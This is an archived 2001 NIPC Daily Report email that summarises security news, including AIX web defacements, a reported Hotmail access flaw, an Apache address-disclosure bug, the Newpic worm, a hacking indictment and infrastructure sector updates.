-----Original Message----- From: NIPC Watch [mailto:nipc.watch@private] Sent: Tuesday, August 21, 2001 9:12 AM To: daily@private Subject: NIPC Daily Report, 21 August 2001 Significant Changes and Assessment - No significant changes Private Sector - Until recently, sites running AIX, a commercial operating system from IBM that is based on Unix, barely made a blip on the radar of the Alldas defacement archive service. Of the more than 22,000 home pages defaced in the past 18 months, just 47 sites, or less than 1%, have been running AIX. Windows, on the other hand, accounts for 65% of defacements. But 32 of those AIX intrusions have occurred in the past three days. Among the victims, ironically, was an IBM corporate Web site in Indonesia. On 18 August, the defacers, a group called Savvy Crew, changed the site's homepage by adding the messages "In Linux We Trust" and "SavvyCrew did penetrate this lame IBM server." The rise in AIX defacements has occurred almost simultaneously with the release of several new programs that exploit old flaws in the operating system. (Source: Newsbytes, 21 August) According to the hacker online publication Root-Core Network, a security hole in Microsoft's Web-based e-mail service Hotmail, allows any account holder to view other users' private messages. In a bulletin posted on its Web site on 18 August, Root-Core members demonstrated how specially crafted URLs could circumvent password security on the Hotmail servers. A Root-Core editor who goes by the handle "Digital-Vortex" reported that Hotmail has been informed of the hole. Hotmail security is guarded by Microsoft's Passport, a service promoted as a "single sign-in" approach to authentication that can span multiple Web sites. (Source: Infosec News, 20 August) A security vulnerability in Apache web server results in the disclosure of the server's internal address. The problem occurs when a HTTP request containing a directory is submitted to the server. If the directory does not contain a trailing "/" character, the server returns a 3xx redirection error code indicating that further action must be taken in order to fulfill the request. When this occurs, a 'Location' response-header containing the address of the server is returned as part of the response. In a situation where the request is redirected to the server behind a firewall, this could lead to the disclosure of the server's internal network address. (Source: InfoSec News, 20 August) A group of security companies is combining their efforts to be better able to combat new, sophisticated attacks such as those posed by the Code Red and Leave worms. This week, McAfee will announce a research and development partnership with three anti-DDoS vendors, Arbor Networks Inc., Asta Networks Inc. and Mazu Networks Inc., with the goal of developing innovative technologies and techniques to detect and prevent DDoS attacks. The alliance, a first among the normally isolationist security vendors, will involve the member companies exchanging research as well as researchers in an effort that officials said is just the beginning of a far reaching initiative. The long term goal of the partnership is to develop and deploy a solution that will enable Internet service providers and data centers to identify when their networks are under a DDoS attack and also to discover and eliminate the "zombies" that attackers use to launch their assaults. (Source: ZDNet.com, 21 August) International - Kaspersky Labs announced the registration of computer infections by the Internet worm "Newpic," which are spreading via the popular MSN Messenger pager network. The current malicious program was detected at the beginning of last week, at which time it was added to the Kaspersky Anti-Virus database with the necessary defense procedures. However, the first incidents connected with "Newpic" were noted this past weekend. "Newpic" is an executable program written in Visual Basic and is compiled in an EXE file about 50Kb in length. Upon execution of the worm-carrying file, "Newpic" displays a fake message pertaining to a file processing error in order to hide its activity. The worm then registers itself in the auto-run registry key so that the worm is automatically executed upon every ensuing computer reboot. (Source: InfoSec News, 20 August) An independent computer programmer in Germany has discovered that malicious hackers could wield seemingly ordinary-looking Web pages to send commands to servers behind such barriers as corporate firewalls. Jochen Topf, found that many common Web browsers can be tricked into passing on commands from hackers unbeknownst to the browsers' users. The trick, Topf wrote last week in a paper called "The HTML Form Protocol Attack," relies on the same HTML-based technology builders of legitimate Web pages use to capture information visitors might enter into online forms. Topf's HTML form protocol attack paper is available at http://www.remote.org/jochen <http://www.remote.org/jochen> . (Source: Newsbytes, 20 August) A computer virus has intruded into administrative information systems of the Japan Coast Guard, damaging part of application software. The Japan Coast Guard suspended its e-mail servers after it discovered the virus infection on 20 August to let an anti-virus service company develop a vaccine for the virus. But the prospect of system restoration is still far from certain. The computer systems of the coast guard are now temporarily out of action, but its home page is operating as usual. (Source: JPP, 20 August) On 20 August, hackers changed the main Web page of Turkey's Finance Ministry causing it to crash. Hackers changed and left a note signed by the Independent Hackers Group. The Finance Ministry's data processing personnel have said that the hackers changed only the main page of the Web site and that no information has been lost. They said that there is a problem with the security script. (Source: Istanbul NTV, 20 August) Government - A Seattle federal court handed down a 13-count indictment last week accusing Vladimirovich Ivanov, of Chelybinsk, Russia, of hacking into a California-based Internet service provider (ISP) and allegedly attempting to extort money from the company's customers. According to court documents, Ivanov was charged with hacking into the networks of VPM, an ISP based in Folsom, California. He allegedly threatened to damage computers connected to the network unless he was paid a certain amount from each victim. Ivanov and his associate Vasili Gorchkov were arrested in Seattle last November after coming to the U.S. for what they believed was a job interview at a Seattle-based high-tech company called Invita. Both men have been indicted on similar federal computer intrusion charges in Santa Ana, Calif., and in New Jersey. According to U.S. Attorney Mark L. Krotoski, Ivanov faces a maximum penalty of five years in prison, and a fine of up to $250,000 on each of the charges. (Source: Newsbytes, 21 August) Military - NTR U.S. SECTOR INFORMATION: Water Supply - Three towboat companies and the man who owns them have pleaded guilty to dumping oil into the Mississippi River. Glenn McKinney and his companies McKinney Towing, McKinney Harbor Towing and Slidell Towing, could be ordered to pay a variety of fines and restitution for violating the federal Clean Water Act. McKinney pleaded guilty on 17 August in U.S. District court on behalf of himself and the three companies. For at least five years and until May 2000, McKinney's boats would pump a water and oil mix from the hulls of at least nine boats into the Mississippi River. The mix came about because the boats were in a constant state of disrepair. The illegal discharges stopped when Louisiana State Police, the federal Environmental Protection Agency and Baton Rouge Police searched the company's Baton Rouge facility and took samples from the boats. The towing companies have agreed to pay $40,000 in restitution to the State Police "Right to Know" fund and $40,000 to the Southern Environmental Enforcement Network. (Source: Associated Press, 20 August) Gas and Oil Storage Distribution - NTR Government Services - NTR Emergency Services - NTR Electrical Power - NTR Telecommunications - NTR Banking and Finance - NTR Transportation - NTR NOTE: Please understand that this is for informational purposes only and does not constitute any verification of the information contained in the report nor does this constitute endorsement by the NIPC or the FBI.
This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:24:18 PDT